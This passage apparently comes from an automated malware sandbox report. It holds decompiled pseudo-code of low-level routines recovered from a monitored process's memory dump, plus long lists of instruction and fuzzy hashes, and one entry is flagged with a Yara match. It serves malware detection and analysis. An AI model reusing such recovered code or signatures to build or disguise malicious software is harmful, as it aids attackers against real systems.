                                                				signed int _t53;
                                                				signed int _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                				signed int _t62;
                                                
                                                				_t49 = __edx;
                                                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                				_t26 =  *0x16dd360 ^ _t62;
                                                				_v8 =  *0x16dd360 ^ _t62;
                                                				_t41 = __ecx;
                                                				_t51 = __edx;
                                                				_v12 = __ecx;
                                                				if(_a4 == 0) {
                                                					if(_a8 != 0) {
                                                						goto L1;
                                                					}
                                                					_v13 = 1;
                                                					E01602280(_t26, 0x16d8608);
                                                					_t58 =  *_t41;
                                                					if(_t58 == 0) {
                                                						L11:
                                                						E015FFFB0(_t41, _t51, 0x16d8608);
                                                						L2:
                                                						 *0x16db1e0(_a4, _a8);
                                                						_t42 =  *_t51();
                                                						if(_t42 == 0) {
                                                							_t29 = 0;
                                                							L5:
                                                							_pop(_t52);
                                                							_pop(_t59);
                                                							_pop(_t43);
                                                							return E0162B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                						}
                                                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                						if(_v21 != 0) {
                                                							_t53 = 0;
                                                							E01602280(_t28, 0x16d8608);
                                                							_t32 = _v24;
                                                							if( *_t32 == _t58) {
                                                								 *_t32 = _t42;
                                                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                								if(_t58 != 0) {
                                                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                									asm("sbb edi, edi");
                                                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                								}
                                                							}
                                                							E015FFFB0(_t42, _t53, 0x16d8608);
                                                							if(_t53 != 0) {
                                                								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                							}
                                                						}
                                                						_t29 = _t42;
                                                						goto L5;
                                                					}
                                                					if( *((char*)(_t58 + 0x40)) != 0) {
                                                						L10:
                                                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                						E015FFFB0(_t41, _t51, 0x16d8608);
                                                						_t29 = _t58;
                                                						goto L5;
                                                					}
                                                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				}
                                                				L1:
                                                				_v13 = 0;
                                                				_t58 = 0;
                                                				goto L2;
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9419261e5d76074e44c2c77b7bd34dcf4b6fa73ae8dddd135c7412bbfc5785fc
                                                • Instruction ID: 98459ed44c92406825f789c3645a15643fc037fd463d813b1fd4454c0ca8bd96
                                                • Opcode Fuzzy Hash: 9419261e5d76074e44c2c77b7bd34dcf4b6fa73ae8dddd135c7412bbfc5785fc
                                                • Instruction Fuzzy Hash: 79310232602AA29BC7229F59CD44B2ABBA9FFC1710F00446DED564B745CBB0D804CF85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a6ca985bcfc3a9186867414ba23880cfb3d8381e07c97a31fe4b1de2eac3eda
                                                • Instruction ID: d56c8f58a6c71818a1936abfb10991abfd625a96f6a1d4d41b6b3df8715b71f8
                                                • Opcode Fuzzy Hash: 9a6ca985bcfc3a9186867414ba23880cfb3d8381e07c97a31fe4b1de2eac3eda
                                                • Instruction Fuzzy Hash: 4E41B1B1D006289FDB20CFAAD980AADFBF8FB48310F5041AEE509A7600EB745A44CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0161E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                				intOrPtr* _v0;
                                                				signed char _v4;
                                                				signed int _v8;
                                                				void* __ecx;
                                                				void* __ebp;
                                                				void* _t37;
                                                				intOrPtr _t38;
                                                				signed int _t44;
                                                				signed char _t52;
                                                				void* _t54;
                                                				intOrPtr* _t56;
                                                				void* _t58;
                                                				char* _t59;
                                                				signed int _t62;
                                                
                                                				_t58 = __edx;
                                                				_push(0);
                                                				_push(4);
                                                				_push( &_v8);
                                                				_push(0x24);
                                                				_push(0xffffffff);
                                                				if(E01629670() < 0) {
                                                					L0163DF30(_t54, _t58, _t35);
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t54);
                                                					_t52 = _v4;
                                                					if(_t52 > 8) {
                                                						_t37 = 0xc0000078;
                                                					} else {
                                                						_t38 =  *0x16d7b9c; // 0x0
                                                						_t62 = _t52 & 0x000000ff;
                                                						_t59 = L01604620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                						if(_t59 == 0) {
                                                							_t37 = 0xc0000017;
                                                						} else {
                                                							_t56 = _v0;
                                                							 *(_t59 + 1) = _t52;
                                                							 *_t59 = 1;
                                                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                							_t44 = _t62 - 1;
                                                							if(_t44 <= 7) {
                                                								switch( *((intOrPtr*)(_t44 * 4 +  &M0161E810))) {
                                                									case 0:
                                                										L6:
                                                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                										goto L7;
                                                									case 1:
                                                										L13:
                                                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                										goto L6;
                                                									case 2:
                                                										L12:
                                                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                										goto L13;
                                                									case 3:
                                                										L11:
                                                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                										goto L12;
                                                									case 4:
                                                										L10:
                                                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                										goto L11;
                                                									case 5:
                                                										L9:
                                                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                										goto L10;
                                                									case 6:
                                                										L17:
                                                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                										goto L9;
                                                									case 7:
                                                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                										goto L17;
                                                								}
                                                							}
                                                							L7:
                                                							 *_a40 = _t59;
                                                							_t37 = 0;
                                                						}
                                                					}
                                                					return _t37;
                                                				} else {
                                                					_push(0x20);
                                                					asm("ror eax, cl");
                                                					return _a4 ^ _v8;
                                                				}
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f594b9cbf55afa16537e2be5cbbfb7af893dd3502eb9a1fd73fe2c148cf2e587
                                                • Instruction ID: 5686cca2295e0bfec14b57d081a5e6bcd167bcf32ca56d1224d08a542404a5e0
                                                • Opcode Fuzzy Hash: f594b9cbf55afa16537e2be5cbbfb7af893dd3502eb9a1fd73fe2c148cf2e587
                                                • Instruction Fuzzy Hash: 2A318C75A14249AFE745CF58CC41B9ABBE4FB08314F18825AFE04CB341D632EC90CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0161BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				void* __ebx;
                                                				void* __edi;
                                                				intOrPtr _t22;
                                                				intOrPtr* _t41;
                                                				intOrPtr _t51;
                                                
                                                				_t51 =  *0x16d6100; // 0x5
                                                				_v12 = __edx;
                                                				_v8 = __ecx;
                                                				if(_t51 >= 0x800) {
                                                					L12:
                                                					return 0;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				while(1) {
                                                					L1:
                                                					_t22 = _t51;
                                                					asm("lock cmpxchg [ecx], edx");
                                                					if(_t51 == _t22) {
                                                						break;
                                                					}
                                                					_t51 = _t22;
                                                					if(_t22 < 0x800) {
                                                						continue;
                                                					}
                                                					goto L12;
                                                				}
                                                				E01602280(0xd, 0x722f1a0);
                                                				_t41 =  *0x16d60f8; // 0x0
                                                				if(_t41 != 0) {
                                                					 *0x16d60f8 =  *_t41;
                                                					 *0x16d60fc =  *0x16d60fc + 0xffff;
                                                				}
                                                				E015FFFB0(_t41, 0x800, 0x722f1a0);
                                                				if(_t41 != 0) {
                                                					L6:
                                                					asm("movsd");
                                                					asm("movsd");
                                                					asm("movsd");
                                                					asm("movsd");
                                                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                					do {
                                                						asm("lock xadd [0x16d60f0], ax");
                                                						 *((short*)(_t41 + 0x34)) = 1;
                                                					} while (1 == 0);
                                                					goto L8;
                                                				} else {
                                                					_t41 = L01604620(0x16d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                					if(_t41 == 0) {
                                                						L11:
                                                						asm("lock dec dword [0x16d6100]");
                                                						L8:
                                                						return _t41;
                                                					}
                                                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                					if(_t41 == 0) {
                                                						goto L11;
                                                					}
                                                					goto L6;
                                                				}
                                                			}











                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7d3d47d2b6c02cae87a9699c118ce2f9de51b582359331be84e9610f41f2eff
                                                • Instruction ID: 6e0f25f098ad569b491dcc835e25f755c3958317665bc9866e503967b18ec815
                                                • Opcode Fuzzy Hash: f7d3d47d2b6c02cae87a9699c118ce2f9de51b582359331be84e9610f41f2eff
                                                • Instruction Fuzzy Hash: DD31DD72A016169BCB22DFA8DC807A677B4FB18311F484079EE44DB30AEB74D916CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                C-Code - Quality: 60%
                                                			E01611DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr* _v20;
                                                				void* _t22;
                                                				char _t23;
                                                				void* _t36;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                
                                                				_v12 = __ecx;
                                                				_t43 = 0;
                                                				_v20 = __edx;
                                                				_t42 =  *__edx;
                                                				 *__edx = 0;
                                                				_v16 = _t42;
                                                				_push( &_v8);
                                                				_push(0);
                                                				_push(0);
                                                				_push(6);
                                                				_push(0);
                                                				_push(__ecx);
                                                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                				_push(_t36);
                                                				_t22 = E0160F460();
                                                				if(_t22 < 0) {
                                                					if(_t22 == 0xc0000023) {
                                                						goto L1;
                                                					}
                                                					L3:
                                                					return _t43;
                                                				}
                                                				L1:
                                                				_t23 = _v8;
                                                				if(_t23 != 0) {
                                                					_t38 = _a4;
                                                					if(_t23 >  *_a4) {
                                                						_t42 = L01604620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                						if(_t42 == 0) {
                                                							goto L3;
                                                						}
                                                						_t23 = _v8;
                                                					}
                                                					_push( &_v8);
                                                					_push(_t23);
                                                					_push(_t42);
                                                					_push(6);
                                                					_push(_t43);
                                                					_push(_v12);
                                                					_push(_t36);
                                                					if(E0160F460() < 0) {
                                                						if(_t42 != 0 && _t42 != _v16) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                						}
                                                						goto L3;
                                                					}
                                                					 *_v20 = _t42;
                                                					 *_a4 = _v8;
                                                				}
                                                				_t43 = 1;
                                                				goto L3;
                                                			}













                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                • Instruction ID: 98bbb61fa12d1061a5bf78b78a3b0ad70a4945e3b71ea45f20af2d175b091cae
                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                • Instruction Fuzzy Hash: 2E218172600119EFD725CFA9CC80EABBBBDEF86680F194155EA05D7250DB34AE01C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7b74b2a54d112f555f202086ee2183dc16def15514df4759900440890e4dba74
                                                • Instruction ID: a551f90945e20e6f113984b9fda271955d31f3c28de4d8bada036ba294b8154f
                                                • Opcode Fuzzy Hash: 7b74b2a54d112f555f202086ee2183dc16def15514df4759900440890e4dba74
                                                • Instruction Fuzzy Hash: 88214A71541602DFC726EF68CE44F1AB7FABF18708F04456CE0499B6A2C734E951CB48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 655a0a5cc52aa5c71b00a3d47b113804fd6a72d658cb132a26543880b7812bf1
                                                • Instruction ID: 28a88304ca34b3309ec39c706e723c8130a6576180e0e98777a2674706454692
                                                • Opcode Fuzzy Hash: 655a0a5cc52aa5c71b00a3d47b113804fd6a72d658cb132a26543880b7812bf1
                                                • Instruction Fuzzy Hash: F5213870A02602CFC726EF69DC08AA8BBE5FF85315B61D26EC129CB665DB319461CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0313cf9ebc5a6c0090a0d03be7802b4ab18fcc3f434ee096efc6f6fc3f23d004
                                                • Instruction ID: d2ee127ee2b4426ca450d34bee45576bff53490ed1c29ac498761672fcf7c661
                                                • Opcode Fuzzy Hash: 0313cf9ebc5a6c0090a0d03be7802b4ab18fcc3f434ee096efc6f6fc3f23d004
                                                • Instruction Fuzzy Hash: BD114E31700351ABE3319A6E9C94F16B7DDFB60B60F2C441EFA03EB285DAB0E8418758
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c245fffca6ce6b0cb391afbdde997b518bcbe42cd5287567a3225792f96567d9
                                                • Instruction ID: 7455156403e36ba6d134a1654a7587176fe601f6cf01f97fac65bd1a36c61661
                                                • Opcode Fuzzy Hash: c245fffca6ce6b0cb391afbdde997b518bcbe42cd5287567a3225792f96567d9
                                                • Instruction Fuzzy Hash: F6E09272A42822ABD3225E58AD00F6773AEDBE4A51F094039FA04C7254DB28DD12C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction ID: df13bc7f64f309bd89d9f1e2d39cdd8241207409c2a3f4a9d22e15d55fe6b3ad
                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                • Instruction Fuzzy Hash: 58E0D832A40118FBDB3596D99E05F5BBFADEB58A60F0401D6BA04DB190D9609D00C2D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d1214f4a59f93aed3e5060e2f323821851753ebe2acf829569f26dcba9c3f81
                                                • Instruction ID: 48feab28ae85ba8d2d830d5bed2b07fc2e650bace3214200bbec9cee2c581503
                                                • Opcode Fuzzy Hash: 0d1214f4a59f93aed3e5060e2f323821851753ebe2acf829569f26dcba9c3f81
                                                • Instruction Fuzzy Hash: 51E0D8B2105204DFD735DF59D880F19379EBB51721F19441FE1184F902D621D880C389
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b5102fa72a5d2865040cecf8c0724305118c4adb2e922b4a64430a516735812
                                                • Instruction ID: 920b78eed91825929c11a5c7daab98fcf42be033e61b19db59330064f40b44fe
                                                • Opcode Fuzzy Hash: 2b5102fa72a5d2865040cecf8c0724305118c4adb2e922b4a64430a516735812
                                                • Instruction Fuzzy Hash: 2CF0F278D12702EECBA2EFA99D087A836A9F794750F42A11AD110C7288CB3444B4CF05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction ID: 38ddaec85395987194826125ed9ef4b550dbe1b3a7dbf2ef520636e15ee0411d
                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                • Instruction Fuzzy Hash: BDE0C231284605FBDF225E84CC00F797B5AEB507A1F104031FE085A7D1CA75AC92D6C4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a15006b11a966b738bbfe858d05736ef38b49c041bcf6a9acf638d60315f133
                                                • Instruction ID: 298f9b2c5f910906dd64c2c364a571be36c44523416ef2d66131e57890819af8
                                                • Opcode Fuzzy Hash: 7a15006b11a966b738bbfe858d05736ef38b49c041bcf6a9acf638d60315f133
                                                • Instruction Fuzzy Hash: 9ED02B6156308116C72E5B40CD15B733213F7807A1F39440CF2034B5E9E96088D4C10C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14181d186070e82d669b8bb9c72a38e9c1dea6f531468b0abc2ddf8ec8d2ba9b
                                                • Instruction ID: 71039b6681997a4d3806d1e3381f62e01fba21134638386d4c45b4dc5a6d7b76
                                                • Opcode Fuzzy Hash: 14181d186070e82d669b8bb9c72a38e9c1dea6f531468b0abc2ddf8ec8d2ba9b
                                                • Instruction Fuzzy Hash: FBD0A73120010292EA2E5B249C24B252652EB91781F3C045CF317495C1DFA1CC92E08C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                • Instruction ID: 5fca35f69775544761e8ece2f47e9716186ad0b1ae8816ab7c93a817d65aa8f2
                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                • Instruction Fuzzy Hash: D0E08C319406849BCF12DB48CA50F5EBBFAFB84B80F150408A1096F761C724AC00CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                • Instruction ID: 4d243d04e2d2f93a48a6281602cd2f46dce03c1ec486f3352129c5fe8568cc1e
                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                • Instruction Fuzzy Hash: 62D0A9314011869EEB02AB14CA187683BB3FB00A28F5CA069C1030EB6EC33A4A0AC600
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                • Instruction ID: 9d48b35b6d2f36afe285889ec460c03250d39ea952b6837fb17a11f61f9f090a
                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                • Instruction Fuzzy Hash: 80D0C935352980CFE717CB0CC954B0933A4BB04B40FC50490E541CBB62E72CD944CA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d5fb9f602e99afbea377a47fc16912cac58216037820373f22f92565366a739
                                                • Instruction ID: 0b3f63cbcccb95feb955e62fe83383fc670b9c662407cb49fd162d03d6f60599
                                                • Opcode Fuzzy Hash: 8d5fb9f602e99afbea377a47fc16912cac58216037820373f22f92565366a739
                                                • Instruction Fuzzy Hash: FA90027121100403D100659959097070009A7D0242F91E411A0414558DD69688617161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 670131419187e97e75a89f4d8b3dc695c0005725f53c840aa197f1433132df6a
                                                • Instruction ID: 8c55553bbe260aef2d8f9d75988c92b251cfa0d1832c1121ea2397de8d51db1a
                                                • Opcode Fuzzy Hash: 670131419187e97e75a89f4d8b3dc695c0005725f53c840aa197f1433132df6a
                                                • Instruction Fuzzy Hash: 9890026121504442D10069995809A070009A7D0246F91E011A1054595DC6758861B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51a58d25487632b52929f8403388a9a98e6151eb9d6dd7df973dabf54a047c02
                                                • Instruction ID: 7025316e59f2a5c1199574e6a1deaa6f2d5fa953e327e84418f185dc062e007e
                                                • Opcode Fuzzy Hash: 51a58d25487632b52929f8403388a9a98e6151eb9d6dd7df973dabf54a047c02
                                                • Instruction Fuzzy Hash: B490027521504442D50069995C05A870009A7D0346F91E411A041459CDC6948871B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83fef0fce0d2334bbdb769b960e560fc8c064c3a885f7e5df14e795ad328ec9a
                                                • Instruction ID: ee991f4317abb924908744fb758eebcb4d7d101983d6ac04c39ab599b7c6c38b
                                                • Opcode Fuzzy Hash: 83fef0fce0d2334bbdb769b960e560fc8c064c3a885f7e5df14e795ad328ec9a
                                                • Instruction Fuzzy Hash: 4690026161500402D140759958197070019A7D0242F91E011A0014554DC6998A6576E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cff23b03add5651f0b0c3040cfbd2dfdf74407481a3907be2c44d0c5f4e51580
                                                • Instruction ID: 456f3350484ef19861df2662780269119387317753f9d9a0ff859fc1bd9bd90c
                                                • Opcode Fuzzy Hash: cff23b03add5651f0b0c3040cfbd2dfdf74407481a3907be2c44d0c5f4e51580
                                                • Instruction Fuzzy Hash: C190026125100802D14075998815707000AE7D0642F91D011A0014554DC656897576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10e68d7a8a1a410ed2b6216f9d2ada5b23a65357df6481ce99b51e2168b2eaab
                                                • Instruction ID: dc1cef64333a49622b499194e94d4a3eb6a2ed480e10056cde325fa1c33d594d
                                                • Opcode Fuzzy Hash: 10e68d7a8a1a410ed2b6216f9d2ada5b23a65357df6481ce99b51e2168b2eaab
                                                • Instruction Fuzzy Hash: A4900271311000529500AAD95C05A4B4109A7F0342B91E015A4004554CC59488716161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8369ccd9985714e1c4dc8bc6d5a1e8c9984d668810c00d4edfe5821fd27b6090
                                                • Instruction ID: ea414585d7c10f7862b72343e5febf9b885a2d86cf028f0d9c4b9e1d99a2b2d5
                                                • Opcode Fuzzy Hash: 8369ccd9985714e1c4dc8bc6d5a1e8c9984d668810c00d4edfe5821fd27b6090
                                                • Instruction Fuzzy Hash: 0390027132114402D110659988057070009A7D1242F91D411A0814558DC6D588A17162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f64e5e30ef5652b9bc5c5938db83cfd01162ec55a7df6978141f756a7a235506
                                                • Instruction ID: 10e9c3fae299062061684be440f88425dd550c0b195140aa70ee1d9ec38ef220
                                                • Opcode Fuzzy Hash: f64e5e30ef5652b9bc5c5938db83cfd01162ec55a7df6978141f756a7a235506
                                                • Instruction Fuzzy Hash: 3B90027121144002D1407599884560B5009B7E0342F91D411E0415554CC6558866A261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4552ae55a9a2f80e9d2610e3f3c4cf63875cf958372e7da18bc5c42168d0eabd
                                                • Instruction ID: 41b874ebe7d5def71d8021511d9ef6756e57a77d89cb090737f3af24336476b4
